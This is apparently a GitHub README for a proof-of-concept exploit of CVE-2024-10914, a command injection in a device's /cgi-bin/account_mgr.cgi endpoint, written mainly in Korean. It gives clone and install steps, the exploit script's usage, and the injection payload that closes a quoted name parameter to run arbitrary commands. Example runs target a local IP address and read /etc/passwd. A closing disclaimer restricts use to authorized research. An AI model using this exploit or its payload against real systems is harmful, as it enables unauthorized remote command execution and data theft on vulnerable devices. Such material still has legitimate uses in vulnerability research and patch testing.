
PoC para explotar el CVE-2024-10914
/cgi-bin/account_mgr.cgi 엔드포인트의 명령어 주입 취약점을 위한 익스플로잇입니다. 이 취약점은 비위생화된 매개변수를 통해 영향을 받는 시스템에서 임의의 명령어를 실행할 수 있게 합니다.
CVE-2024-10914는 CGI 웹 인터페이스가 있는 장치에 영향을 미치는 명령어 주입 취약점입니다. 취약한 애플리케이션은 cgi_user_add 요청에서 name 매개변수를 올바르게 검증하지 않아 공격자가 애플리케이션 권한으로 실행될 시스템 명령어를 주입할 수 있습니다.
저장소를 클론하고 종속성을 설치하세요:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
또는 수동으로 설치:
pip install requests
스크립트는 두 가지 인수를 제공합니다:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>
-u, --url (필수): 대상 URL (예: http://192.168.1.1)-c, --command (선택 사항): 실행할 명령어 (기본값: id)id 명령어 실행:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
사용자 지정 명령어 실행:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
파일 목록 보기:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
익스플로잇은 다음 페이로드를 사용하여 취약한 엔드포인트에 GET 요청을 보냅니다:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "
빈 문자열은 따옴표로 닫히고 원하는 명령어가 주입되어 서버 컨텍스트에서 실행됩니다.
스크립트는 다음을 표시합니다:
이 코드는 교육 및 보안 연구 목적으로만 제공됩니다. 명시적 권한이 있는 시스템에서만 사용해야 합니다. 이 익스플로잇의 무단 사용은 현지 법률을 위반하고 범죄가 될 수 있습니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.
SS3K
명시되지 않음